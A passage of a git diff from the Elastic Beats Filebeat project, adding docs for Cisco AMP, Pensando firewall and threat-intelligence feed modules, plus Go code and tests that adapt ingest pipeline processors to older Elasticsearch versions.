the indicator. -alias to: process.name + +type: keyword -- -*`system.syslog.pid`*:: +*`threatintel.otx.title`*:: + -- -type: alias +Title describing the indicator. -alias to: process.pid + +type: keyword -- -*`system.syslog.message`*:: +*`threatintel.otx.content`*:: + -- -type: alias +Extra text or descriptive content related to the indicator. -alias to: message + +type: keyword + +-- + +*`threatintel.otx.type`*:: ++ +-- +The indicator type, can for example be "domain, email, FileHash-SHA256". + + +type: keyword -- @@ -151188,6 +159840,73 @@ type: integer Height of the screen that is being shared. +type: integer + +-- + +[float] +=== signature + +Fields exported by the Zeek Signature log. + + + +*`zeek.signature.note`*:: ++ +-- +Notice associated with signature event. + + +type: keyword + +-- + +*`zeek.signature.sig_id`*:: ++ +-- +The name of the signature that matched. + + +type: keyword + +-- + +*`zeek.signature.event_msg`*:: ++ +-- +A more descriptive message of the signature-matching event. + + +type: keyword + +-- + +*`zeek.signature.sub_msg`*:: ++ +-- +Extracted payload data or extra message. + + +type: keyword + +-- + +*`zeek.signature.sig_count`*:: ++ +-- +Number of sigs, usually from summary count. + + +type: integer + +-- + +*`zeek.signature.host_count`*:: ++ +-- +Number of hosts, from a summary count. + + type: integer -- diff --git a/filebeat/docs/images/filebeat-pensando-dfw.png b/filebeat/docs/images/filebeat-pensando-dfw.png new file mode 100755 index 000000000000..da98465eee5e Binary files /dev/null and b/filebeat/docs/images/filebeat-pensando-dfw.png differ diff --git a/filebeat/docs/modules/cisco.asciidoc b/filebeat/docs/modules/cisco.asciidoc index 8f55d5c16d86..b3d6c901addd 100644 --- a/filebeat/docs/modules/cisco.asciidoc +++ b/filebeat/docs/modules/cisco.asciidoc @@ -14,6 +14,7 @@ This is a module for Cisco network device's logs and Cisco Umbrella. It includes filesets for receiving logs over syslog or read from a file: - `asa` fileset: supports Cisco ASA firewall logs. +- `amp` fileset: supports Cisco AMP API logs. - `ftd` fileset: supports Cisco Firepower Threat Defense logs. - `ios` fileset: supports Cisco IOS router and switch logs. - `nexus` fileset: supports Cisco Nexus switch logs. @@ -444,6 +445,86 @@ Maximum duration before AWS API request will be interrupted. Default to be 120 s :fileset_ex!: +[float] +==== `amp` fileset settings + +The Cisco AMP fileset focuses on collecting events from your Cisco AMP/Cisco Secure Endpoint API. + +To configure the Cisco AMP fileset you will need to retrieve your `client_id` and `api_key` from the AMP dashboard. +For more information on how to retrieve these credentials, please reference the https://api-docs.amp.cisco.com/api_resources?api_host=api.amp.cisco.com&api_version=v1[Cisco AMP API documentation]. + +The URL configured for the API depends on which region your AMP is located, currently there are three choices: +- api.amp.cisco.com +- api.apjc.amp.cisco.com +- api.eu.amp.cisco.com + +If new endpoints are added by Cisco in the future, please reference the API URL list located at the https://api-docs.amp.cisco.com/[Cisco AMP API Docs]. + +Example config: + +[source,yaml] +---- +- module: cisco + amp: + enabled: true + var.input: httpjson + var.url: https://api.amp.cisco.com/v1/events + var.client_id: 123456 + var.api_key: sfda987gdf90s0df0 +---- + +When starting up the Filebeat module for the first time, you are able to configure how far back you want Filebeat to collect existing events from. +It is also possible to select how often Filebeat will check the Cisco AMP API. Another example below which looks back 200 hours and have a custom timeout: + +[source,yaml] +---- +- module: cisco + amp: + enabled: true + var.input: httpjson + var.url: https://api.amp.cisco.com/v1/events + var.client_id: 123456 + var.api_key: sfda987gdf90s0df0 + var.first_interval: 200h + var.interval: 60m + var.request_timeout: 120s + var.limit: 100 + +---- + +*`var.input`*:: + +The input from which messages are read. Supports httpjson. + +*`var.url`*:: + +The URL to the Cisco AMP API endpoint, this url value depends on your region. It will be the same region as your Cisco AMP Dashboard URL. + +*`var.client_id`*:: + +The ID for the user account used to access the API. + +*`var.api_key`*:: + +The API secret used together with the related client_id. + +*`var.request_timeout`*:: + +When handling large influxes of events, especially for large enterprises, the API might take longer to respond. This value is to set a custom +timeout value for each request sent by Filebeat. + +*`var.first_interval`*:: + +How far back you would want to collect events the first time the Filebeat module starts up. Supports amount in hours(example: 24h), minutes(example: 10m) and seconds(example: 50s). + +*`var.limit`*:: + +This value controls how many events are returned by the Cisco AMP API per page. + +:has-dashboards!: + +:fileset_ex!: + [float] === Example dashboard diff --git a/filebeat/docs/modules/pensando.asciidoc b/filebeat/docs/modules/pensando.asciidoc new file mode 100644 index 000000000000..88c2924a8f10 --- /dev/null +++ b/filebeat/docs/modules/pensando.asciidoc @@ -0,0 +1,69 @@ +//// +This file is generated! See scripts/docs_collector.py +//// + +[[filebeat-module-pensando]] +:modulename: pensando +:has-dashboards: true + +== pensando module + +The +{modulename}+ module parses distributed firewall logs created by the +http://pensando.io/[Pensando] distributed services card (DSC). + + +include::../include/what-happens.asciidoc[] + +include::../include/gs-link.asciidoc[] + +[float] +=== Compatibility + +The Pensando module has been tested with 1.12.0-E-54 and later. + +include::../include/configuring-intro.asciidoc[] +The following example shows how to set parameters in the +modules.d/{modulename}.yml+ +file to listen for firewall logs sent from the Pensando DSC(s) on port 5514 (default is 9001): + +["source","yaml",subs="attributes"] +----- +- module: pensando + access: + enabled: true + var.syslog_host: 0.0.0.0 + var.syslog_port: [9001] +----- +:fileset_ex: dfw + +include::../include/config-option-intro.asciidoc[] + +TODO: document the variables from each fileset. If you're describing a variable +that's common to other modules, you can reuse shared descriptions by including +the relevant file. For example: + +[float] +==== `dfw` log fileset settings + +include::../include/var-paths.asciidoc[] + +[float] +=== Example dashboard + +This module comes with a sample dashboard. For example: + +[role="screenshot"] +image::./images/filebeat-pensando-dfw.png[] + +:has-dashboards!: + +:fileset_ex!: + +:modulename!: + + +[float] +=== Fields + +For a description of each field in the module, see the +<> section. + diff --git a/filebeat/docs/modules/threatintel.asciidoc b/filebeat/docs/modules/threatintel.asciidoc new file mode 100644 index 000000000000..ef98c6344cde --- /dev/null +++ b/filebeat/docs/modules/threatintel.asciidoc @@ -0,0 +1,314 @@ +//// +This file is generated! See scripts/docs_collector.py +//// + +[[filebeat-module-threatintel]] +[role="xpack"] + +:modulename: threatintel +:has-dashboards: false + + +== Threat Intel module +beta[] + +This module is a collection of different threat intelligence sources. The ingested data is meant to be used with [Indicator Match rules]https://www.elastic.co/guide/en/security/7.11/rules-ui-create.html#create-indicator-rule, but is also +compatible with other features like [Enrich Processors]https://www.elastic.co/guide/en/elasticsearch/reference/current/enrich-processor.html. +The related threat intel attribute that is meant to be used for matching incoming source data is stored under the `threatintel.indicator.*` fields. + +Currently supporting: +- `abuseurl` fileset: Supports URL entities from Abuse.ch +- `abusemalware` fileset: Supports Malware/Payload entities from Abuse.ch +- `misp` fileset: Supports gathering threat intel attributes from MISP +- `otx` fileset: Supports gathering threat intel attributes from Alienvault OTX +- `anomali` fileset: Supports gathering threat intel attributes from Anomali + +include::../include/gs-link.asciidoc[] + + +[float] +==== `abuseurl` fileset settings + +This fileset contacts the AbuseCH API and fetches all new malicious URLs found the last 60 minutes. + +To configure the module, please utilize the default URL unless specified as the example below: + +[source,yaml] +---- +- module: threatintel + abuseurl: + enabled: true + var.input: httpjson + var.url: https://urlhaus-api.abuse.ch/v1/urls/recent/ + var.interval: 60m +---- + +include::../include/var-paths.asciidoc[] + +*`var.url`*:: + +The URL of the API endpoint to connect with. + +*`var.interval`*:: + +How often the API is polled for updated information. + +AbuseCH URL Threat Intel is mapped to the following ECS fields +[options="header"] +|============================================================== +| URL Threat Intel Fields' | ECS Fields | +| url | threat.indicator.url.full | +| date_added | @timestamp | +| host | threat.indicator.ip/domain | +|============================================================== + +[float] +==== `abusemalware` fileset settings + +This fileset contacts the AbuseCH API and fetches all new malicious hashes found the last 60 minutes. + +To configure the module, please utilize the default URL unless specified as the example below: + +[source,yaml] +---- +- module: threatintel + abusemalware: + enabled: true + var.input: httpjson + var.url: https://urlhaus-api.abuse.ch/v1/payloads/recent/ + var.interval: 60m +---- + +include::../include/var-paths.asciidoc[] + +*`var.url`*:: + +The URL of the API endpoint to connect with. + +*`var.interval`*:: + +How often the API is polled for updated information. + +AbuseCH Malware Threat Intel is mapped to the following ECS fields +[options="header"] +|================================================================ +| Malware Threat IntelFields | ECS Fields | +| md5_hash | threat.indicato.file.hash.md5 | +| sha256_hash | threat.indicator.file.hash.sha256| +| file_size | threat.indicator.file.size | +|================================================================ + +[float] +==== `misp` fileset settings + +This fileset communicates with a local or remote MISP server. Not to be confused with the older MISP Module (link here). + +The fileset configuration allows to set the polling interval, how far back it should look initially, and optionally any filters used to filter the results. + +[source,yaml] +---- +- module: threatintel + misp: + enabled: true + var.input: httpjson + var.url: https://SERVER/events/restSearch + var.api_token: xVfaM3DSt8QEwO2J1ix00V4ZHJs14nq5GMsHcK6Z + var.initial_interval: 24h + var.interval: 60m +---- + +To configure the output with filters, use fields that already exist on the MISP server, and define either a single value or multiple. +By adding a filter, only events that has attributes which matches the filter will be returned. + +The below filters is only examples, for a full list of all fields please reference the MISP fields located on the MISP server itself. + +[source,yaml] +---- +- module: threatintel + misp: + enabled: true + var.input: httpjson + var.url: https://SERVER/events/restSearch + var.api_token: xVfaM3DSt8QEwO2J1ix00V4ZHJs14nq5GMsHcK6Z + var.filters: + - type: ["md5", "sha256", "url", "ip-src"] + - threat_level: 4 + var.initial_interval: 24h + var.interval: 60m +---- + +include::../include/var-paths.asciidoc[] + +*`var.url`*:: + +The URL of the API endpoint to connect with. + +*`var.interval`*:: + +How often the API is polled for updated information. + +*`var.first_interval`*:: + +How far back to search when retrieving events the first time the beat starts up. +After the first interval has passed the module itself will use the timestamp from the last response as the filter when retrieving new events. + +*`var.filters`*:: + +List of filters to apply when retrieving new events from the MISP server, this field is optional and defaults to all events. + +MISP Threat Intel is mapped to the following ECS fields +[options="header"] +|============================================================== +| Malware Threat IntelFields | ECS Fields | +| misp.first_seen | threat.indicator.first_seen | +| misp.last_seen | threat.indicator.last_seen | +| misp.tag | tag | +| misp.value | threat.indicator.* | +|============================================================== +misp.value is mapped to the appropriate field dependant on attribute type + +[float] +==== `otx` fileset settings + +To configure the module, please utilize the default URL unless specified as the example below: + +[source,yaml] +---- +- module: threatintel + otx: + enabled: true + var.input: httpjson + var.url: https://otx.alienvault.com/api/v1/indicators/export + var.api_token: 754dcaafbcb9740dc0d119e72d5eaad699cc4a5cdbc856fc6215883842ba8142 + var.first_interval: 24h + var.lookback_range: 2h + var.interval: 60m +---- + +To filter only on specific indicator types, this is an example of some possible filters supported: + +[source,yaml] +---- +- module: threatintel + otx: + enabled: true + var.input: httpjson + var.url: https://otx.alienvault.com/api/v1/indicators/export + var.types: "domain,IPv4,hostname,url,FileHash-SHA256" + var.first_interval: 24h + var.interval: 60m +---- + +include::../include/var-paths.asciidoc[] + +*`var.url`*:: + +The URL of the API endpoint to connect with. + +*`var.api_token`*:: + +The API key used to access OTX. This can be found on your https://otx.alienvault.com/api[OTX API homepage]. + +*`var.interval`*:: + +How often the API is polled for updated information. + +*`var.first_interval`*:: + +How far back to search when retrieving events the first time the beat starts up. +After the first interval has passed the module itself will use the timestamp from the last response as the filter when retrieving new events. + +*`var.types`*:: + +A comma delimited list of indicator types to include, defaults to all. A list of possible types to filter on can be found on the https://cybersecurity.att.com/documentation/usm-appliance/otx/about-otx.htm[Alienvault OTX documentation page] + + +OTX Threat Intel is mapped to the following ECS fields +[options="header"] +|======================================================| +| Malware Threat IntelFields | ECS Fields | +| otx.type | threat.indicator.type | +| otx.description | threat.indicator.description | +| otx.indicator | threat.indicator.* | +|======================================================| +otx.indicator is mapped to the appropriate field dependant on attribute type. + +[float] +==== `anomali` fileset settings + +To configure the module please fill in the credentials, for Anomali Limo (the free Taxii service) these are usually default credentials found at the https://www.anomali.com/resources/limo[Anomali Limo webpage] +Anomali Limo offers multiple sources called collections. Each collection has a specific ID, which then fits into the url +used in this configuration. A list of different collections can be found using the credentials at https://limo.anomali.com/api/v1/taxii2/feeds/collections/[Limo Collections]. + +The example below uses the collection of ID 41 as can be seen in the URL. + +[source,yaml] +---- +- module: threatintel + anomali: + enabled: true + var.input: httpjson + var.url: https://limo.anomali.com/api/v1/taxii2/feeds/collections/41/objects?match[type]=indicator + var.username: guest + var.password: guest + var.interval: 60m +---- + +To filter on specifc types, you can define var.types as a comma delimited list of object types. This defaults to "indicators" + +[source,yaml] +---- +- module: threatintel + anomali: + enabled: true + var.input: httpjson + var.url: https://limo.anomali.com/api/v1/taxii2/feeds/collections/41/objects?match[type]=indicator + var.types: "indicators,other" + var.username: guest + var.password: guest + var.interval: 60m +---- + +include::../include/var-paths.asciidoc[] + +*`var.url`*:: + +The URL of the API endpoint to connect with. Limo offers multiple collections of threat intelligence. + +*`var.username`*:: + +Username used to access the API. + +*`var.password`*:: + +Password used to access the API. + +*`var.interval`*:: + +How often the API is polled for updated information. + +*`var.types`*:: + +A comma delimited list of indicator types to include, defaults to all. A list of possible types to filter on can be found on the https://oasis-open.github.io/cti-documentation/stix/intro.html#stix-21-objects[Stix 2.1 Object types] page. + +Anomali Threat Intel is mapped to the following ECS fields +[options="header"] +|============================================================== +| Malware Threat IntelFields | ECS Fields | +| anomali.description | threat.indicator.description | +| anomali.created | threat.indicator.first_seen | +| anomali.modified | threat.indicator.last_seen | +| anomali.pattern | threat.indicator.* | +| anomali.labels | tags | +|============================================================== +anomali.pattern is mapped to the appropriate field dependant on attribute type. + +:modulename!: + + +[float] +=== Fields + +For a description of each field in the module, see the +<> section. + diff --git a/filebeat/docs/modules_list.asciidoc b/filebeat/docs/modules_list.asciidoc index 8d97764be50b..aec43cb354e2 100644 --- a/filebeat/docs/modules_list.asciidoc +++ b/filebeat/docs/modules_list.asciidoc @@ -50,6 +50,7 @@ This file is generated! See scripts/docs_collector.py * <> * <> * <> + * <> * <> * <> * <> @@ -63,6 +64,7 @@ This file is generated! See scripts/docs_collector.py * <> * <> * <> + * <> * <> * <> * <> @@ -120,6 +122,7 @@ include::modules/okta.asciidoc[] include::modules/oracle.asciidoc[] include::modules/osquery.asciidoc[] include::modules/panw.asciidoc[] +include::modules/pensando.asciidoc[] include::modules/postgresql.asciidoc[] include::modules/proofpoint.asciidoc[] include::modules/rabbitmq.asciidoc[] @@ -133,6 +136,7 @@ include::modules/sophos.asciidoc[] include::modules/squid.asciidoc[] include::modules/suricata.asciidoc[] include::modules/system.asciidoc[] +include::modules/threatintel.asciidoc[] include::modules/tomcat.asciidoc[] include::modules/traefik.asciidoc[] include::modules/zeek.asciidoc[] diff --git a/filebeat/filebeat.reference.yml b/filebeat/filebeat.reference.yml index 2a5533bb6363..e232640ffd0c 100644 --- a/filebeat/filebeat.reference.yml +++ b/filebeat/filebeat.reference.yml @@ -335,6 +335,18 @@ filebeat.modules: # of the document. The default is true. #var.use_namespace: true +#------------------------------- Pensando Module ------------------------------- +- module: pensando +# Firewall logs + dfw: + enabled: true + var.syslog_host: 0.0.0.0 + var.syslog_port: 9001 + + # Set custom paths for the log files. If left empty, + # Filebeat will choose the paths depending on your OS. + # var.paths: + #------------------------------ PostgreSQL Module ------------------------------ #- module: postgresql # Logs diff --git a/filebeat/fileset/compatibility.go b/filebeat/fileset/compatibility.go new file mode 100644 index 000000000000..210c93e1b4c4 --- /dev/null +++ b/filebeat/fileset/compatibility.go @@ -0,0 +1,224 @@ +// Licensed to Elasticsearch B.V. under one or more contributor +// license agreements. See the NOTICE file distributed with +// this work for additional information regarding copyright +// ownership. Elasticsearch B.V. licenses this file to you under +// the Apache License, Version 2.0 (the "License"); you may +// not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package fileset + +import ( + "fmt" + "strings" + + "github.com/pkg/errors" + + "github.com/elastic/beats/v7/libbeat/common" + "github.com/elastic/beats/v7/libbeat/logp" +) + +// processorCompatibility defines a processor's minimum version requirements or +// a transformation to make it compatible. +type processorCompatibility struct { + checkVersion func(esVersion *common.Version) bool // Version check returns true if this check applies. + procType string // Elasticsearch Ingest Node processor type. + adaptConfig func(processor map[string]interface{}, log *logp.Logger) (drop bool, err error) // Adapt the configuration to make it compatible. +} + +var processorCompatibilityChecks = []processorCompatibility{ + { + procType: "append", + checkVersion: func(esVersion *common.Version) bool { + return esVersion.LessThan(common.MustNewVersion("7.10.0")) + }, + adaptConfig: replaceAppendAllowDuplicates, + }, + { + procType: "community_id", + checkVersion: func(esVersion *common.Version) bool { + return esVersion.LessThan(common.MustNewVersion("7.12.0")) + }, + adaptConfig: deleteProcessor, + }, + { + procType: "set", + checkVersion: func(esVersion *common.Version) bool { + return esVersion.LessThan(common.MustNewVersion("7.9.0")) + }, + adaptConfig: replaceSetIgnoreEmptyValue, + }, + { + procType: "uri_parts", + checkVersion: func(esVersion *common.Version) bool { + return esVersion.LessThan(common.MustNewVersion("7.12.0")) + }, + adaptConfig: deleteProcessor, + }, + { + procType: "user_agent", + checkVersion: func(esVersion *common.Version) bool { + return esVersion.LessThan(common.MustNewVersion("7.0.0")) && + !esVersion.LessThan(common.MustNewVersion("6.7.0")) + }, + adaptConfig: func(config map[string]interface{}, _ *logp.Logger) (bool, error) { + config["ecs"] = true + return false, nil + }, + }, + { + procType: "user_agent", + checkVersion: func(esVersion *common.Version) bool { + return esVersion.LessThan(common.MustNewVersion("6.7.0")) + }, + adaptConfig: func(config map[string]interface{}, _ *logp.Logger) (bool, error) { + return false, errors.New("user_agent processor requires option 'ecs: true', Elasticsearch 6.7 or newer required") + }, + }, +} + +// adaptPipelineForCompatibility iterates over all processors in the pipeline +// and adapts them for version of Elasticsearch used. Adapt can mean modifying +// processor options or removing the processor. +func adaptPipelineForCompatibility(esVersion common.Version, pipelineID string, content map[string]interface{}, log *logp.Logger) error { + p, ok := content["processors"] + if !ok { + return errors.New("'processors' is missing from the pipeline definition") + } + + processors, ok := p.([]interface{}) + if !ok { + return fmt.Errorf("'processors' in pipeline '%s' expected to be a list, found %T", pipelineID, p) + } + + var filteredProcs []interface{} + +nextProcessor: + for i, obj := range processors { + processor, ok := obj.(map[string]interface{}) + if !ok { + return fmt.Errorf("processor at index %d is not an object, got %T", i, obj) + } + + for _, proc := range processorCompatibilityChecks { + configIfc, found := processor[proc.procType] + if !found { + continue + } + config, ok := configIfc.(map[string]interface{}) + if !ok { + return fmt.Errorf("processor config at index %d is not an object, got %T", i, obj) + } + + if !proc.checkVersion(&esVersion) { + continue + } + + drop, err := proc.adaptConfig(config, log.With("processor_type", proc.procType, "processor_index", i)) + if err != nil { + return fmt.Errorf("failed to adapt %q processor at index %d: %w", proc.procType, i, err) + } + if drop { + continue nextProcessor + } + } + + filteredProcs = append(filteredProcs, processors[i]) + } + + content["processors"] = filteredProcs + return nil +} + +// deleteProcessor returns true to indicate that the processor should be deleted +// in order to adapt the pipeline for backwards compatibility to Elasticsearch. +func deleteProcessor(_ map[string]interface{}, _ *logp.Logger) (bool, error) { return true, nil } + +// replaceSetIgnoreEmptyValue replaces ignore_empty_value option with an if +// statement so ES less than 7.9 will work. +func replaceSetIgnoreEmptyValue(config map[string]interface{}, log *logp.Logger) (bool, error) { + _, ok := config["ignore_empty_value"].(bool) + if !ok { + return false, nil + } + + log.Debug("Removing unsupported 'ignore_empty_value' from set processor.") + delete(config, "ignore_empty_value") + + _, ok = config["if"].(string) + if ok { + // assume if check is sufficient + return false, nil + } + val, ok := config["value"].(string) + if !ok { + return false, nil + } + + newIf := strings.TrimLeft(val, "{ ") + newIf = strings.TrimRight(newIf, "} ") + newIf = strings.ReplaceAll(newIf, ".", "?.") + newIf = "ctx?." + newIf + " != null" + + log.Debug("Adding if %s to replace 'ignore_empty_value' in set processor.", newIf) + config["if"] = newIf + return false, nil +} + +// replaceAppendAllowDuplicates replaces allow_duplicates option with an if statement +// so ES less than 7.10 will work. +func replaceAppendAllowDuplicates(config map[string]interface{}, log *logp.Logger) (bool, error) { + allow, ok := config["allow_duplicates"].(bool) + if !ok { + return false, nil + } + + log.Debug("Removing unsupported 'allow_duplicates' from append processor.") + delete(config, "allow_duplicates") + + if allow { + // It was set to true, nothing else to do after removing the option. + return false, nil + } + + currIf, _ := config["if"].(string) + if strings.Contains(strings.ToLower(currIf), "contains") { + // If it has a contains statement, we assume it is checking for duplicates already. + return false, nil + } + field, ok := config["field"].(string) + if !ok { + return false, nil + } + val, ok := config["value"].(string) + if !ok { + return false, nil + } + + field = strings.ReplaceAll(field, ".", "?.") + + val = strings.TrimLeft(val, "{ ") + val = strings.TrimRight(val, "} ") + val = strings.ReplaceAll(val, ".", "?.") + + if currIf == "" { + // if there is not a previous if we add a value sanity check + currIf = fmt.Sprintf("ctx?.%s != null", val) + } + + newIf := fmt.Sprintf("%s && ((ctx?.%s instanceof List && !ctx?.%s.contains(ctx?.%s)) || ctx?.%s != ctx?.%s)", currIf, field, field, val, field, val) + + log.Debug("Adding if %s to replace 'allow_duplicates: false' in append processor.", newIf) + config["if"] = newIf + + return false, nil +} diff --git a/filebeat/fileset/compatibility_test.go b/filebeat/fileset/compatibility_test.go new file mode 100644 index 000000000000..bc089879082b --- /dev/null +++ b/filebeat/fileset/compatibility_test.go @@ -0,0 +1,643 @@ +// Licensed to Elasticsearch B.V. under one or more contributor +// license agreements. See the NOTICE file distributed with +// this work for additional information regarding copyright +// ownership. Elasticsearch B.V. licenses this file to you under +// the Apache License, Version 2.0 (the "License"); you may +// not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +// +build !integration + +package fileset + +import ( + "testing" + + "github.com/stretchr/testify/assert" + "github.com/stretchr/testify/require" + + "github.com/elastic/beats/v7/libbeat/common" + "github.com/elastic/beats/v7/libbeat/logp" +) + +func TestAdaptPipelineForCompatibility(t *testing.T) { + cases := []struct { + name string + esVersion *common.Version + content map[string]interface{} + expected map[string]interface{} + isErrExpected bool + }{ + { + name: "ES < 6.7.0", + esVersion: common.MustNewVersion("6.6.0"), + content: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "user_agent": map[string]interface{}{ + "field": "foo.http_user_agent", + }, + }, + }}, + isErrExpected: true, + }, + { + name: "ES == 6.7.0", + esVersion: common.MustNewVersion("6.7.0"), + content: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "rename": map[string]interface{}{ + "field": "foo.src_ip", + "target_field": "source.ip", + }, + }, + map[string]interface{}{ + "user_agent": map[string]interface{}{ + "field": "foo.http_user_agent", + }, + }, + }, + }, + expected: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "rename": map[string]interface{}{ + "field": "foo.src_ip", + "target_field": "source.ip", + }, + }, + map[string]interface{}{ + "user_agent": map[string]interface{}{ + "field": "foo.http_user_agent", + "ecs": true, + }, + }, + }, + }, + isErrExpected: false, + }, + { + name: "ES >= 7.0.0", + esVersion: common.MustNewVersion("7.0.0"), + content: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "rename": map[string]interface{}{ + "field": "foo.src_ip", + "target_field": "source.ip", + }, + }, + map[string]interface{}{ + "user_agent": map[string]interface{}{ + "field": "foo.http_user_agent", + }, + }, + }, + }, + expected: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "rename": map[string]interface{}{ + "field": "foo.src_ip", + "target_field": "source.ip", + }, + }, + map[string]interface{}{ + "user_agent": map[string]interface{}{ + "field": "foo.http_user_agent", + }, + }, + }, + }, + isErrExpected: false, + }, + } + + for _, test := range cases { + test := test + t.Run(test.name, func(t *testing.T) { + t.Parallel() + err := adaptPipelineForCompatibility(*test.esVersion, "foo-pipeline", test.content, logp.NewLogger(logName)) + if test.isErrExpected { + assert.Error(t, err) + } else { + require.NoError(t, err) + assert.Equal(t, test.expected, test.content) + } + }) + } +} + +func TestReplaceSetIgnoreEmptyValue(t *testing.T) { + cases := []struct { + name string + esVersion *common.Version + content map[string]interface{} + expected map[string]interface{} + isErrExpected bool + }{ + { + name: "ES < 7.9.0", + esVersion: common.MustNewVersion("7.8.0"), + content: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "set": map[string]interface{}{ + "field": "rule.name", + "value": "{{panw.panos.ruleset}}", + "ignore_empty_value": true, + }, + }, + }}, + expected: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "set": map[string]interface{}{ + "field": "rule.name", + "value": "{{panw.panos.ruleset}}", + "if": "ctx?.panw?.panos?.ruleset != null", + }, + }, + }, + }, + isErrExpected: false, + }, + { + name: "ES == 7.9.0", + esVersion: common.MustNewVersion("7.9.0"), + content: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "set": map[string]interface{}{ + "field": "rule.name", + "value": "{{panw.panos.ruleset}}", + "ignore_empty_value": true, + }, + }, + }}, + expected: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "set": map[string]interface{}{ + "field": "rule.name", + "value": "{{panw.panos.ruleset}}", + "ignore_empty_value": true, + }, + }, + }, + }, + isErrExpected: false, + }, + { + name: "ES > 7.9.0", + esVersion: common.MustNewVersion("8.0.0"), + content: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "set": map[string]interface{}{ + "field": "rule.name", + "value": "{{panw.panos.ruleset}}", + "ignore_empty_value": true, + }, + }, + }}, + expected: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "set": map[string]interface{}{ + "field": "rule.name", + "value": "{{panw.panos.ruleset}}", + "ignore_empty_value": true, + }, + }, + }, + }, + isErrExpected: false, + }, + { + name: "existing if", + esVersion: common.MustNewVersion("7.7.7"), + content: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "set": map[string]interface{}{ + "field": "rule.name", + "value": "{{panw.panos.ruleset}}", + "ignore_empty_value": true, + "if": "ctx?.panw?.panos?.ruleset != null", + }, + }, + }}, + expected: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "set": map[string]interface{}{ + "field": "rule.name", + "value": "{{panw.panos.ruleset}}", + "if": "ctx?.panw?.panos?.ruleset != null", + }, + }, + }}, + isErrExpected: false, + }, + { + name: "ignore_empty_value is false", + esVersion: common.MustNewVersion("7.7.7"), + content: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "set": map[string]interface{}{ + "field": "rule.name", + "value": "{{panw.panos.ruleset}}", + "ignore_empty_value": false, + "if": "ctx?.panw?.panos?.ruleset != null", + }, + }, + }}, + expected: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "set": map[string]interface{}{ + "field": "rule.name", + "value": "{{panw.panos.ruleset}}", + "if": "ctx?.panw?.panos?.ruleset != null", + }, + }, + }}, + isErrExpected: false, + }, + { + name: "no value", + esVersion: common.MustNewVersion("7.7.7"), + content: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "set": map[string]interface{}{ + "field": "rule.name", + "ignore_empty_value": false, + }, + }, + }}, + expected: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "set": map[string]interface{}{ + "field": "rule.name", + }, + }, + }}, + isErrExpected: false, + }, + } + + for _, test := range cases { + test := test + t.Run(test.name, func(t *testing.T) { + t.Parallel() + err := adaptPipelineForCompatibility(*test.esVersion, "foo-pipeline", test.content, logp.NewLogger(logName)) + if test.isErrExpected { + assert.Error(t, err) + } else { + require.NoError(t, err) + assert.Equal(t, test.expected, test.content, test.name) + } + }) + } +} + +func TestReplaceAppendAllowDuplicates(t *testing.T) { + cases := []struct { + name string + esVersion *common.Version + content map[string]interface{} + expected map[string]interface{} + isErrExpected bool + }{ + { + name: "ES < 7.10.0: set to true", + esVersion: common.MustNewVersion("7.9.0"), + content: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "append": map[string]interface{}{ + "field": "related.hosts", + "value": "{{host.hostname}}", + "allow_duplicates": true, + }, + }, + }}, + expected: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "append": map[string]interface{}{ + "field": "related.hosts", + "value": "{{host.hostname}}", + }, + }, + }, + }, + isErrExpected: false, + }, + { + name: "ES < 7.10.0: set to false", + esVersion: common.MustNewVersion("7.9.0"), + content: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "append": map[string]interface{}{ + "field": "related.hosts", + "value": "{{host.hostname}}", + "allow_duplicates": false, + }, + }, + }}, + expected: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "append": map[string]interface{}{ + "field": "related.hosts", + "value": "{{host.hostname}}", + "if": "ctx?.host?.hostname != null && ((ctx?.related?.hosts instanceof List && !ctx?.related?.hosts.contains(ctx?.host?.hostname)) || ctx?.related?.hosts != ctx?.host?.hostname)", + }, + }, + }, + }, + isErrExpected: false, + }, + { + name: "ES == 7.10.0", + esVersion: common.MustNewVersion("7.10.0"), + content: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "append": map[string]interface{}{ + "field": "related.hosts", + "value": "{{host.hostname}}", + "allow_duplicates": false, + }, + }, + }}, + expected: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "append": map[string]interface{}{ + "field": "related.hosts", + "value": "{{host.hostname}}", + "allow_duplicates": false, + }, + }, + }, + }, + isErrExpected: false, + }, + { + name: "ES > 7.10.0", + esVersion: common.MustNewVersion("8.0.0"), + content: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "append": map[string]interface{}{ + "field": "related.hosts", + "value": 